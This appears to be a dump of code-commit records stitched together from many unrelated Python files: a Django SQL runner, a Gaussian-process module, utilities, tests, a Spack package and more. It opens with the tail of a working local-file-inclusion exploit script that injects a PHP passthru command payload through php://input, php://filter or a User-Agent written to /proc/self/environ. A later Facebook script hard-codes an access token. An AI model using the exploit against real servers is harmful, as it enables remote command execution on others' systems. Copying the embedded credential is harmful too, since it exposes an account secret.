# search for base64 strings, shorter than 16 chars is refused
regexp_b64 = re.compile ('[A-Za-z0-9+/=]{16,}=+')
words = regexp_b64.findall (content)
# validate each base64
# if validated it is added to our list
results = list()
for word in words:
found = True
decoded = ''
try:
decoded = base64.b64decode (word)
except Exception:
found = False
if found == False and len (re.findall ('=+$', word)) != 0:
decoded = word
found = True
if found == True and len (decoded) != 0:
results.append (decoded)
return results
parser = argparse.ArgumentParser(description='Exploit LFI')
parser.add_argument('--url', '-u', nargs=1, type=str, help='URL to attack', required=True)
parser.add_argument('--arg', '-a', nargs=1, type=str, help='Technique argument', required=True)
parser.add_argument('--technique', '-t', nargs=1, default='env', help='input, env or read')

args = parser.parse_args ()

# PHP payload wrapping the command output in STARTSTART/ENDEND markers
# so scrap_results() can locate it in the response.
payload = '<?php echo "STARTSTART"; passthru ("{0}"); echo "ENDEND"; ?>'.format (args.arg[0])

if args.technique[0] == 'input':
    # php://input technique: payload travels in the POST body.
    form = {
        '' : payload
    }
    filename = 'php://input'
    url = args.url[0].replace ('PAYLOAD', filename)
    req = requests.get (url, data=form)
    # print result
    results = scrap_results (req.text)
    for result in results:
        print result
elif args.technique[0] == 'read':
    # php://filter technique: read a file base64-encoded to avoid execution.
    php_filter = 'php://filter/convert.base64-encode/resource=' + args.arg[0]
    url = args.url[0].replace ('PAYLOAD', php_filter)
    req = requests.get (url)
    # print result
    results = scrap_b64str (req.text)
    for result in results:
        print result
else:
    # /proc/self/environ technique: payload injected via the User-Agent.
    headers = {
        'User-Agent' : payload
    }
    filename = '/proc/self/environ'
    url = args.url[0].replace ('PAYLOAD', filename)
    print url
    req = requests.get (url, headers=headers)
    # print result
    results = scrap_results (req.text)
    for result in results:
        print result
| Python | 0.000001 | |
3654817845e1d22a5b0e648a79d0bf6db12c2704 | add run_sql shell command | treeherder/model/management/commands/run_sql.py | treeherder/model/management/commands/run_sql.py | import MySQLdb
from optparse import make_option
from django.core.management.base import BaseCommand
from treeherder.model.models import Datasource
from django.conf import settings
class Command(BaseCommand):
    """Run an arbitrary SQL file against one or more Treeherder datasources."""

    help = ("Runs an arbitrary sql statement or file"
            " on a number of databases.")

    option_list = BaseCommand.option_list + (

        make_option(
            '--datasources',
            action='store',
            dest='datasources',
            default='all',
            help='A comma separated list of datasources to execute the sql code on'),

        make_option(
            '--data-type',
            action='store',
            dest='data_type',
            default='jobs',
            choices=['jobs', 'objectstore'],
            help='The target data-type of the sql code'),

        make_option(
            '-f', '--file',
            dest='sql_file',
            help='Sql source file',
            metavar='FILE',
            default="")

    )

    def handle(self, *args, **options):
        """Read the SQL file and execute it on every selected datasource."""
        if not options["sql_file"]:
            self.stderr.write("No sql file provided!")
            return

        datasources = Datasource.objects.filter(contenttype=options['data_type'])
        if options['datasources'] != 'all':
            if ',' in options['datasources']:
                datasources = datasources.filter(
                    project__in=options['datasources'].split(','))
            else:
                datasources = datasources.filter(
                    project=options['datasources'])

        with open(options["sql_file"]) as sql_file:
            sql_code = sql_file.read()

        self.stdout.write("{0} datasource found".format(
            len(datasources)
        ))
        for datasource in datasources:
            self.stdout.write("--------------------------")
            db = MySQLdb.connect(
                host=datasource.host,
                db=datasource.name,
                user=settings.TREEHERDER_DATABASE_USER,
                passwd=settings.TREEHERDER_DATABASE_PASSWORD)
            # Initialize before the try block: the original referenced
            # 'cursor' in finally, raising NameError if db.cursor() failed
            # on the first iteration (or closing a stale cursor later).
            cursor = None
            try:
                cursor = db.cursor()
                cursor.execute(sql_code)
                self.stdout.write("Sql code executed on {0}".format(datasource))
            except Exception as e:
                error_string = "!!! Sql code execution failed on {0} !!!"
                self.stderr.write(error_string.format(datasource))
                self.stderr.write("{0}".format(e))
            finally:
                if cursor:
                    cursor.close()
                # Close the per-datasource connection (was leaked before).
                db.close()
| Python | 0.000002 | |
31924096f82954e87b33fcb4af2e7ea46a5c6336 | add map estimate of gaussian case | vlgp/gmap.py | vlgp/gmap.py | import click
# import jax
import numpy as onp
import jax.numpy as np
from jax.numpy import linalg
from .evaluation import timer
from .gp import sekernel
from .preprocess import get_config, get_params, initialize, fill_params, fill_trials
from .util import cut_trials
def make_prior(trials, n_factors, dt, var, scale):
    """Attach the block-diagonal GP prior covariance ``bigK`` to each trial.

    The squared-exponential kernel is evaluated on the trial's time grid
    and replicated once per latent factor via a Kronecker product with the
    identity, so factors are a priori independent.
    """
    factor_eye = np.eye(n_factors)
    for trial in trials:
        n_bins = trial['y'].shape[0]
        timegrid = np.arange(n_bins) * dt
        kern = sekernel(timegrid, var, scale)
        trial['bigK'] = np.kron(factor_eye, kern)
def em(y, C, d, R, K, max_iter):
    """EM for a linear-Gaussian factor model: z ~ GP prior, y = z C + d + noise.

    y : (m, n, ydim) stacked trial segments (m segments of n bins each).
    C : (zdim, ydim) loading matrix; d : bias row; R : diagonal observation
    noise covariance; K : (n, n) per-factor prior covariance.
    Returns the final posterior means z and the updated C, d, R.
    """
    zdim, ydim = C.shape
    n = K.shape[0]
    m = y.shape[0]
    # Prior/noise covariances expanded to the full stacked space:
    # bigK is (n*zdim, n*zdim), bigR is (n*ydim, n*ydim).
    bigK = np.kron(np.eye(zdim), K)
    bigR = np.kron(np.eye(n), R)
    Y = y.reshape(-1, ydim)
    for i in range(max_iter):
        # E step: posterior mean of z given the current C, d, R.
        with timer() as e_elapsed:
            bigC = np.kron(C.T, np.eye(n))
            A = bigK @ bigC.T
            B = bigC @ A + bigR
            residual = y - d[None, :]
            residual = residual.transpose((0, 2, 1)).reshape(m, -1, 1)
            z = A[None, ...] @ linalg.solve(B[None, ...], residual)
            z = z.reshape(m, zdim, -1).transpose((0, 2, 1))
            # Center the latents; the removed offset is absorbed into d
            # when the bias is refitted in the M step.
            z -= z.mean(axis=(0, 1), keepdims=True)
        # M step: refit loadings/bias/noise by least squares.
        with timer() as m_elapsed:
            Z = z.reshape(-1, zdim)
            C, d, r = leastsq(Y, Z)  # Y = Z C + d
            # NOTE(review): numpy.linalg.lstsq already returns r as per-column
            # sums of SQUARED residuals; squaring again here looks odd -- confirm.
            R = np.diag(r ** 2)
            # Fix the scale ambiguity between C and z.
            C /= linalg.norm(C)
        click.echo("Iteration {:4d}, E-step {:.2f}s, M-step {:.2f}s".format(i + 1, e_elapsed(), m_elapsed()))
    return z, C, d, R
def infer(trials, C, d, R):
    """Posterior mean of the latent trajectories for whole trials.

    Uses each trial's precomputed prior covariance (trial['bigK']) and the
    fitted C, d, R; writes the result into trial['mu'] in place.
    """
    for trial in trials:
        n, ydim = trial['y'].shape
        _, zdim = trial['mu'].shape
        # Center the observations and stack them column-major into (n*ydim, 1).
        y = trial['y'] - d[None, :]
        y = y.T.reshape(-1, 1)
        bigC = np.kron(C.T, np.eye(n))
        bigK = trial['bigK']
        bigR = np.kron(np.eye(n), R)
        # Gaussian conditioning: E[z|y] = K C' (C K C' + R)^{-1} y.
        A = bigK @ bigC.T
        z = A @ linalg.solve(bigC @ A + bigR, y)
        trial['mu'] = z.reshape((zdim, -1)).T
def leastsq(Y, Z, constant=True):
    """Ordinary least squares fit of ``Y = Z @ C (+ d)``.

    Parameters
    ----------
    Y : (n, ydim) array of targets.
    Z : (n, zdim) array of regressors.
    constant : bool, optional
        If True (default), an intercept row ``d`` is fitted jointly.

    Returns
    -------
    C : (zdim, ydim) coefficient matrix.
    d : (1, ydim) intercept row (all zeros when ``constant`` is False).
    r : per-column sums of squared residuals, as returned by
        ``numpy.linalg.lstsq``.
    """
    if constant:
        # Append a column of ones so the intercept is estimated jointly;
        # it comes back as the last row of the solution.
        Z = np.column_stack([Z, np.ones(Z.shape[0])])
        C, r, *_ = onp.linalg.lstsq(Z, Y, rcond=None)
        return C[:-1, :], C[[-1], :], r
    # Bug fix: the constant=False path previously also stripped the last
    # coefficient row and returned it as an intercept, corrupting C.
    C, r, *_ = onp.linalg.lstsq(Z, Y, rcond=None)
    return C, np.zeros((1, Y.shape[1])), r
def loglik(y, z, C, d, R, var, scale, dt):
    """Objective combining reconstruction error and the GP prior penalty.

    y : (m, n, ydim) observations; z : (m, n, zdim) latents.
    NOTE(review): up to additive constants this is 2x the negative joint
    log density (residual chi-square + prior quadratic form + log|K| term)
    -- confirm the intended sign/scale before comparing across models.
    """
    zdim, ydim = C.shape
    m, n, _ = y.shape
    t = np.arange(n) * dt
    K = sekernel(t, var, scale)
    bigK = np.kron(np.eye(zdim), K)
    # Whitened reconstruction residuals (assumes R is diagonal, so 1/sqrt(R)
    # scales each output dimension independently).
    r = y - z @ C - d[None, :]
    r = r @ (1 / np.sqrt(R))
    # Stack latents per segment into (m, n*zdim, 1) for the prior quadratic form.
    Z = z.transpose((0, 2, 1)).reshape(m, -1, 1)
    return np.sum(r ** 2) + np.sum(Z.transpose((0, 2, 1)) @ linalg.solve(bigK[None, ...], Z)) + m * linalg.slogdet(bigK)[1]
def fit(trials, n_factors, **kwargs):
    """Fit the latent factor model to a list of trials.

    :param trials: list of trial dicts, each holding at least the
        observation array ``trial['y']``; mutated in place.
    :param n_factors: number of latent factors to fit.
    :param kwargs: configuration overrides; must include ``R``, ``dt``,
        ``var`` and ``scale``.
    :return: tuple ``(y, z, C, d, R)`` with the stacked segments, the
        inferred latents and the fitted parameters.
    """
    config = get_config(**kwargs)
    kwargs["omega_bound"] = config["omega_bound"]
    params = get_params(trials, n_factors, **kwargs)
    # initialization
    click.echo("Initializing")
    with timer() as elapsed:
        initialize(trials, params, config)
    click.secho("Initialized {:.2f}s".format(elapsed()), fg="green")
    # fill arrays
    fill_params(params)
    params['R'] = kwargs['R']
    dt = kwargs['dt']
    var = kwargs['var']
    scale = kwargs['scale']
    fill_trials(trials)
    make_prior(trials, n_factors=n_factors, dt=dt, var=var, scale=scale)
    # Cut trials into equal-length segments so they can be stacked into one
    # (m, window, ydim) array for the EM loop.
    segments = cut_trials(trials, params, config)
    y = np.stack([segment['y'] for segment in segments])
    # fill_trials(segments)
    # make_prior(segments, n_factors=n_factors, dt=kwargs['dt'], var=kwargs['var'], scale=kwargs['scale'])
    # EM
    click.echo("Fitting")
    C, d, R = params['a'], params['b'], params['R']
    n = config["window"]
    t = np.arange(n) * dt
    K = sekernel(t, var, scale)
    z, C, d, R = em(y, C, d, R, K, config['max_iter'])
    params['a'], params['b'], params['R'] = C, d, R
    # Inference
    # click.echo("Inferring")
    # infer(trials, C, d, R)
    # click.secho("Done", fg="green")
    return y, z, C, d, R
| Python | 0 | |
5b20a487afa90c0d91a43d4d29526d352511316f | add utils.py with utilities | utils.py | utils.py | from csv import DictReader
import re
def read_csv(filename):
    """Load *filename* as a list of row dictionaries (Excel CSV dialect)."""
    with open(filename) as handle:
        reader = DictReader(handle, dialect='excel')
        return [row for row in reader]
def split_name(string):
    """Split a ``"SURNAME Name"`` string into ``(name, surname)``.

    The surname is the leading run of upper-case letters (plus apostrophes,
    dots and internal spaces); everything after the separating space is the
    given name.
    """
    match = re.search(r'^([A-Z\'\.\s]+)\s(.+)$', string)
    surname = match.group(1)
    name = match.group(2)
    return name, surname
def iterate_names(name, surname):
    """Yield ``(name, surname)`` pairs, progressively dropping trailing words.

    The full pair is produced first; then the name is shortened one word at
    a time (keeping the full surname), and finally the surname is shortened
    one word at a time (keeping the already-shortened name).
    """
    yield name, surname
    while True:
        head, sep, _ = name.rpartition(' ')
        if not sep:
            break
        name = head
        yield name, surname
    while True:
        head, sep, _ = surname.rpartition(' ')
        if not sep:
            break
        surname = head
        yield name, surname
| Python | 0.000001 | |
89d8e6a8a422bade352d3bf94f2c59c1d0dc601b | Create dictionary.py | dictionary.py | dictionary.py | x = {'job': 'teacher', 'color': 'blue'} // Create a dictionary, list with defination
# Bug fix: the original used C-style `//` trailing comments, which are not
# valid Python syntax and made the whole file a SyntaxError.
# Create a dictionary literal: keys mapped to values.
x = {'job': 'teacher', 'color': 'blue'}
print(x['job'])  # You will see 'teacher'
# Dictionary values may themselves be dictionaries (nesting).
y = {'emotion': 'happy', 'reason': {'action': 'playing game', 'platform': 'PC'}}
print(y['reason']['action'])  # You will see 'playing game'
b08341d2822ad266e07d4104a45604ad9d5b504a | add unit test for text_analyzer | src/text_analyzer.py | src/text_analyzer.py | import os
import unittest
def analyze_text(filename):
    """Return ``(line_count, char_count)`` for the text file *filename*."""
    line_count = 0
    char_count = 0
    with open(filename, 'r') as handle:
        for row in handle:
            line_count += 1
            char_count += len(row)
    return (line_count, char_count)
class TextAnalysisTests(unittest.TestCase):
    """Tests for the ``analyze_text()`` function."""
    def setUp(self):
        # Create a 4-line, 78-character fixture file before each test.
        self.filename = 'funfile.txt'
        with open(self.filename, 'w') as f:
            f.write('Spring is here. \n'
                    'As the birds sing. \n'
                    'And the flowers and bees. \n'
                    'In such a joy.')
    def tearDown(self):
        # Best-effort cleanup; the file may already be gone.
        # NOTE(review): bare except also swallows KeyboardInterrupt.
        try:
            os.remove(self.filename)
        except:
            pass
    def test_function_runs(self):
        # Smoke test: the function is callable on a real file.
        analyze_text(self.filename)
    def test_line_count(self):
        # The fixture has exactly 4 lines.
        self.assertEqual(analyze_text(self.filename)[0], 4)
    def test_charactor_count(self):
        # 78 characters including the newline characters.
        self.assertEqual(analyze_text(self.filename)[1], 78)
    def test_no_such_file(self):
        # A missing file must surface as IOError (OSError alias on Py3).
        with self.assertRaises(IOError):
            analyze_text("foo")
    def test_no_deletion(self):
        # Analysis must be read-only: the input file survives the call.
        analyze_text(self.filename)
        self.assertTrue(os.path.exists(self.filename))
if __name__ == '__main__':
    unittest.main()
| Python | 0.000002 | |
e1aa02badee2951f4f4aeeb09f37be030466e711 | Add pyupgrades.py | bin/pyupgrades.py | bin/pyupgrades.py | #!/usr/bin/env python
import xmlrpclib
import pip
import argparse
import re
from pkg_resources import parse_version
def version_number_compare(version1, version2):
    """Compare two version strings using setuptools' version parsing.

    Returns a negative number if version1 < version2, zero if equal and a
    positive number if version1 > version2 -- the same contract as
    Python 2's ``cmp``.
    """
    v1 = parse_version(version1)
    v2 = parse_version(version2)
    # Bug fix: everything after the original first `return` (a nested
    # `normalize` helper and a second `return`) was unreachable dead code.
    # (a > b) - (a < b) reproduces cmp() and also works on Python 3, where
    # cmp() no longer exists.
    return (v1 > v2) - (v1 < v2)
# Display templates for the per-package report lines.
package_format = '{dist.project_name} {dist.version}'
display_format = '{package:40} {message}'
if __name__ == '__main__':
    # NOTE: Python 2 script (print statements, xmlrpclib).
    parser = argparse.ArgumentParser(description='Process some integers.')
    parser.add_argument('-a', '--all', dest='all', action='store_true', default=False)
    parser.add_argument('-m', '--mirror', dest='mirror', default='http://pypi.python.org/pypi')
    args = parser.parse_args()
    # NOTE(review): argparse Namespace objects are always truthy, so this
    # guard can never fire -- dead code; confirm the intended check.
    if not args:
        exit(-1)
    # Query the PyPI XML-RPC API for each locally installed distribution.
    pypi = xmlrpclib.ServerProxy(args.mirror)
    for dist in pip.get_installed_distributions():
        package_str = package_format.format(dist=dist)
        available = pypi.package_releases(dist.project_name)
        if not available:
            # Try the capitalized package name
            available = pypi.package_releases(dist.project_name.capitalize())
        # NOTE(review): upgrade_available is assigned but never read.
        upgrade_available = True
        if not available:
            print display_format.format(package=package_str, message='no releases at pypi')
            continue
        # Negative => local is newer; zero => up to date; positive => upgrade.
        comparison = version_number_compare(available[0], dist.version)
        if comparison == 0:
            # Only report up-to-date packages when --all was requested.
            if not args.all:
                continue
            print display_format.format(package=package_str, message='up to date')
        elif comparison < 0:
            print display_format.format(package=package_str, message='older version on pypi')
        else:
            print display_format.format(package=package_str, message='%s available' % available[0])
| Python | 0.000003 | |
7b09a44c7df8b2aa28e45c5382626c2f8c4bf61b | Add a script to convert from rst style files to markdown | bin/run_redpen.py | bin/run_redpen.py | #!/usr/bin/python
import os
import re
import shutil
from optparse import OptionParser
def main():
    """Convert every reStructuredText file under the input directory to
    Markdown with pandoc, writing the results into the output directory."""
    parser = OptionParser(usage="usage: %prog [options]",
                          version="%prog 1.0")
    parser.add_option("-i", "--inputdir",
                      action="store",
                      dest="indir",
                      default="source",
                      help="specify the input directory containing rst files.")
    parser.add_option("-o", "--outdir",
                      action="store",
                      dest="outdir",
                      default="build/mdfiles",
                      help="specify the output directory of markdownized files.")
    (options, args) = parser.parse_args()
    indir = options.indir
    outdir = options.outdir

    # Start from a clean output directory.
    if os.path.exists(outdir):
        shutil.rmtree(outdir)
    os.makedirs(outdir)

    # Compile once (and anchor on the extension) instead of recompiling for
    # every file; the original ".*\.rst" also matched names like "a.rstx".
    rstfile_pat = re.compile(r".*\.rst$")
    for root, dirs, files in os.walk(indir):
        for file in files:
            if not rstfile_pat.search(file):
                continue
            fileroot, ext = os.path.splitext(file)
            # Bug fix: pandoc's reader/writer were swapped
            # ("-r markdown -w rst"), converting in the wrong direction for
            # a script whose purpose is rst -> markdown (.md output).
            cmdline = "pandoc -r rst -w markdown %s -o %s" % (os.path.join(root, file),
                                                              outdir + "/" + fileroot + ".md")
            os.system(cmdline)
if __name__ == '__main__':
main()
| Python | 0 | |
30c368f1794f7bbc4121f732143ac07e7148a3ca | Create KevinAndExpectation.py | Probability/KevinAndExpectation.py | Probability/KevinAndExpectation.py | # Importing standard libraries
import sys
from math import sqrt
# Parsing functions
def parseInt(stream):
    """Read one line from *stream* and return it as an int."""
    line = stream.readline()
    return int(line.rstrip())
'''
Dynamically precomputing the summation series for N < 10^6 so that each test case
is solved in constnat time for any N less than 10^6. There fore for Task 1, this
solution takes O(1) time
'''
# Computing the summation series
def getL(N):
    """Prefix sums of sqrt(4i - 3): L[k] = sum_{i=1..k} sqrt(4i - 3).

    L[0] stays 0; requires N >= 1 (L[1] is seeded with sqrt(1) = 1.0).
    """
    prefix = [0] * (N + 1)
    prefix[1] = 1.0
    total = 1.0
    for i in range(2, N + 1):
        total += sqrt(i * 4.0 - 3.0)
        prefix[i] = total
    return prefix
'''
For N greater than 10^6 we take an approximation of the series since we have not
precomputed it already. This approximation was obtained from Wolfram alpha
'''
def getAns(N):
    """Closed-form approximation of sum_{i=1..N} sqrt(4i-3) ~ (4/3) * N**1.5."""
    return N ** 1.5 * (4.0 / 3.0)
# Main function for the program
if __name__ == "__main__":
    # NOTE: Python 2 script (print statements). Input format: first line T
    # (number of test cases), then one N per line.
    stream = sys.stdin
    T = parseInt(stream)
    # Precompute the summation series once so every N < 10^6 is answered O(1).
    L = getL(1000000)
    for i in range(T):
        N = parseInt(stream)
        if(N < 1000000):
            summationN = L[N]
            ans = 0.5 - 1.0/N + (0.5/N) * (summationN)
            print ans
        else:
            # Beyond the precomputed range, fall back to the closed-form
            # approximation of the series.
            summationN = getAns(N)
            ans = 0.5 - 1.0/N + (0.5/N) * (summationN)
            print ans
| Python | 0 | |
53b0d93a7a29121e9d24058bfe4b7ee3bd33f7ca | Add info for version 2.16 (#3601) | var/spack/repos/builtin/packages/ack/package.py | var/spack/repos/builtin/packages/ack/package.py | ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Ack(Package):
    """ack is a tool like grep, optimized for programmers.

    Designed for programmers with large heterogeneous trees of
    source code, ack is written purely in portable Perl 5 and takes
    advantage of the power of Perl's regular expressions."""
    homepage = "http://beyondgrep.com/"
    url = "http://beyondgrep.com/ack-2.14-single-file"
    # md5 checksums of the single-file releases; expand=False because each
    # download is a standalone Perl script, not an archive.
    version('2.16', '7085b5a5c76fda43ff049410870c8535', expand=False)
    version('2.14', 'e74150a1609d28a70b450ef9cc2ed56b', expand=False)
    # A perl interpreter is needed at run time (shebang rewritten in install).
    depends_on('perl')
    def install(self, spec, prefix):
        """Install the single-file script and point its shebang at the
        perl dependency so it runs outside of build environments."""
        mkdirp(prefix.bin)
        ack = 'ack-{0}-single-file'.format(self.version)
        # rewrite the script's #! line to call the perl dependency
        shbang = '#!' + join_path(spec['perl'].prefix.bin, 'perl')
        filter_file(r'^#!/usr/bin/env perl', shbang, ack)
        install(ack, join_path(prefix.bin, "ack"))
        set_executable(join_path(prefix.bin, "ack"))
| ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Ack(Package):
"""ack 2.14 is a tool like grep, optimized for programmers.
Designed for programmers with large heterogeneous trees of
source code, ack is written purely in portable Perl 5 and takes
advantage of the power of Perl's regular expressions."""
homepage = "http://beyondgrep.com/"
url = "http://beyondgrep.com/ack-2.14-single-file"
version('2.14', 'e74150a1609d28a70b450ef9cc2ed56b', expand=False)
depends_on('perl')
def install(self, spec, prefix):
mkdirp(prefix.bin)
ack = 'ack-{0}-single-file'.format(self.version)
# rewrite the script's #! line to call the perl dependency
shbang = '#!' + join_path(spec['perl'].prefix.bin, 'perl')
filter_file(r'^#!/usr/bin/env perl', shbang, ack)
install(ack, join_path(prefix.bin, "ack"))
set_executable(join_path(prefix.bin, "ack"))
| Python | 0 |
3b30e8a66ca5a3c68055696c339a44fffc98afb3 | compute jaccard with numpy boradcasting | exercise/broadcast.py | exercise/broadcast.py | import numpy as np
# a = np.array([1.0, 2.0, 3.0])
# b = 2.0
# print(a * b)
# x = np.arange(4)
# xx = x.reshape(4,1)
#
# y = np.ones(5)
# x = np.array([1,2]).reshape((2,1))
# y =np.arange(4).reshape((1,4))
#
# print(x-y)
# from numpy import array, argmin, sqrt, sum
#
# observation = array([111.0,188.0])
#
# codes = array([[102.0, 203.0],
# [132.0, 193.0],
# [45.0, 155.0],
# [57.0, 173.0]])
#
# # observation = observation.reshape((1,-1))
# # distance = np.sqrt((observation[:,0] - codes[:,0]) ** 2 + (observation[:,1] - codes[:,1]) ** 2)
#
# diff = codes - observation
# distance = (diff **2).sum(axis=-1)
#
# min_ind = np.argmin(np.sqrt(distance))
# print(codes[min_ind])
# Boxes are (ymin, xmin, ymax, xmax). Reshaping ground truths to (G, 1, 4)
# and anchors to (1, A, 4) lets numpy broadcasting produce the full (G, A)
# pairwise IoU matrix without explicit loops.
gt_bboxes = np.array([[0,0,1,2],[1,0,3,4]]).reshape((-1,1,4))
anchors = np.array([[100,100,105,105],[2,1,3,3.5],[0,0,10,10]]).reshape((1,-1,4))
# Intersection rectangle of every (gt, anchor) pair.
inter_ymin = np.maximum(gt_bboxes[:,:,0], anchors[:,:,0])
inter_xmin = np.maximum(gt_bboxes[:,:,1], anchors[:,:,1])
inter_ymax = np.minimum(gt_bboxes[:,:,2], anchors[:,:,2])
inter_xmax = np.minimum(gt_bboxes[:,:,3], anchors[:,:,3])
# Clamp at 0 so non-overlapping pairs get zero intersection area.
h = np.maximum(inter_ymax - inter_ymin, 0.)
w = np.maximum(inter_xmax - inter_xmin, 0.)
inter_area = h * w
anchors_area = (anchors[:,:,3] - anchors[:,:,1]) * (anchors[:,:,2] - anchors[:,:,0])
gt_bboxes_area = (gt_bboxes[:,:,3] - gt_bboxes[:,:,1]) * (gt_bboxes[:,:,2] - gt_bboxes[:,:,0])
# Inclusion-exclusion: |A u B| = |A| + |B| - |A n B|.
union_area = anchors_area - inter_area + gt_bboxes_area
jaccard = inter_area/union_area
print(jaccard)
| Python | 0.999999 | |
d0d182605389ec73773df35b9e06455b9f9a2923 | add get_posts | facebook/get_posts.py | facebook/get_posts.py | """
A simple example script to get all posts on a user's timeline.
Originally created by Mitchell Stewart.
<https://gist.github.com/mylsb/10294040>
"""
import facebook
import requests
def some_action(post):
    """Handle one post from the Graph API feed.

    Replace this with whatever per-post processing you need (for example
    reading post['message'] or post['picture']); this sample implementation
    just prints the post's creation timestamp.
    """
    created = post['created_time']
    print(created)
# You'll need an access token here to do anything. You can get a temporary one
# here: https://developers.facebook.com/tools/explorer/
# NOTE(security): a real credential is hard-coded in source; tokens should be
# loaded from the environment or a secrets store, never committed.
access_token = 'CAAHPNmH9dEUBAJ53c9925baOfzbjsCmaAujxZBSEBBpIKqxBwyqBTDMsQSZCsfxReqDlAIsyAWC6ZCtLMibt5G6AcHy2nDb2IC4pvFz0SMJWpnMJol3Rzvt80PKNz9IYGDHfNZBQTF3VhI36yDE8qiI2EzTK7LKuNLBEq3AugsSgXdFGtKcbP2UOtoZCZBaRSZBxHzph5yOmV5yflsJ5258'
# Look at Bill Gates's profile for this example by using his Facebook id.
user = 'BillGates'
graph = facebook.GraphAPI(access_token)
profile = graph.get_object(user)
posts = graph.get_connections(profile['id'], 'posts')
# Wrap this block in a while loop so we can keep paginating requests until
# finished.
while True:
    try:
        # Perform some action on each post in the collection we receive from
        # Facebook.
        [some_action(post=post) for post in posts['data']]
        # Attempt to make a request to the next page of data, if it exists.
        posts = requests.get(posts['paging']['next']).json()
    except KeyError:
        # When there are no more pages (['paging']['next']), break from the
        # loop and end the script.
        break
| Python | 0.000005 | |
419ca7099bf47ed00ede73d9de14690a643a3943 | Add data for integration testing of basic csv and crosstab formats | test/test_integration.py | test/test_integration.py | """Integrations tests for EcoData Retriever"""
import os
import shutil
from retriever import HOME_DIR
# Fixture for a plain CSV dataset: the retriever script should reproduce the
# raw data unchanged.
simple_csv = {'name': 'simple_csv',
              'raw_data': "a,b,c\n1,2,3\n4,5,6",
              'script': "shortname: simple_csv\ntable: simple_csv, http://example.com/simple_csv.txt",
              'expect_out': "a,b,c\n1,2,3\n4,5,6"}
# Fixture for a crosstab dataset: columns c1/c2 must be melted into (c, val)
# long-format rows by the ct_column/ct_names directives.
crosstab = {'name': 'crosstab',
            'raw_data': "a,b,c1,c2\n1,1,1.1,1.2\n1,2,2.1,2.2",
            'script': "shortname: crosstab\ntable: crosstab, http://example.com/crosstab.txt\n*column: a, int\n*column: b, int\n*ct_column: c\n*column: val, ct-double\n*ct_names: c1,c2",
            'expect_out': "a,b,c,val\n1,1,c1,1.1\n1,1,c2,1.2\n1,2,c1,2.1\n1,2,c2,2.2"}
# All fixtures the integration suite iterates over.
tests = [simple_csv, crosstab]
| Python | 0 | |
465fbc1657e90134323fd05ee4216da5af110ee4 | add tools | pycrawler/utils/tools.py | pycrawler/utils/tools.py | __author__ = 'mengpeng'
import time
def gethash(string, cap=0xffffffff):
    """Return ``hash(string)`` masked down to the low bits selected by *cap*."""
    return cap & hash(string)
def timestamp():
    """Current local time formatted as ``HH:MM:SS``."""
    now = time.localtime(time.time())
    return time.strftime("%H:%M:%S", now)
def datastamp():
    """Current local date formatted as ``YYYY-MM-DD``."""
    now = time.localtime(time.time())
    return time.strftime("%Y-%m-%d", now)
def fullstamp():
return time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(time.time())) | Python | 0.000001 | |
1983e84e41f6dfe8b54e4a7d7535d0b89f9dd58a | add an example of a client for a change | examples/parallel_client.py | examples/parallel_client.py | '''a bunch of examples of how to get a list of urls in parallel
each of them uses a different greenhouse api to retrieve a list of urls in
parallel and return a dictionary mapping urls to response bodies
'''
import urllib2
import greenhouse
# urllib2 obviously doesn't explicitly use greenhouse sockets, but we can
# override socket.socket so it uses them anyway
greenhouse.io.monkeypatch()
#
# simply schedule greenlets and use an event to signal the all clear
#
def _get_one(url, results, count, done_event):
    """Greenlet body: fetch one url, record it, and signal when all done.

    NOTE(review): completion is detected via len(results) == count, which
    assumes the urls are unique -- duplicates would undercount and the
    event would never fire. Confirm callers guarantee uniqueness.
    """
    results[url] = urllib2.urlopen(url).read()
    if (len(results)) == count:
        done_event.set() # wake up the original greenlet
def get_urls(urls):
    """Fetch *urls* concurrently; return {url: response_body}."""
    count = len(urls)
    results = {}
    alldone = greenhouse.Event()
    # each url gets its own greenlet to fetch it
    for index, url in enumerate(urls):
        greenhouse.schedule(_get_one, args=(url, results, count, alldone))
    alldone.wait()
    return results
#
# create two Queue objects, one for sending urls to be processed, another for
# sending back the results.
#
# this is a little awkward for this specific use case, but is more like how you
# might do it if you don't have a bounded set of inputs but will want to
# constantly send off jobs to be run.
#
def _queue_runner(in_q, out_q, stop):
    """Worker loop: pull urls from in_q until the *stop* sentinel arrives,
    pushing (url, body) pairs onto out_q."""
    while 1:
        url = in_q.get()
        # Identity check against the sentinel object ends this worker.
        if url is stop:
            break
        out_q.put((url, urllib2.urlopen(url).read()))
def get_urls_queue(urls, parallelism=None):
    """Fetch *urls* with a pool of queue-fed workers; return {url: body}."""
    in_q = greenhouse.Queue()
    out_q = greenhouse.Queue()
    results = {}
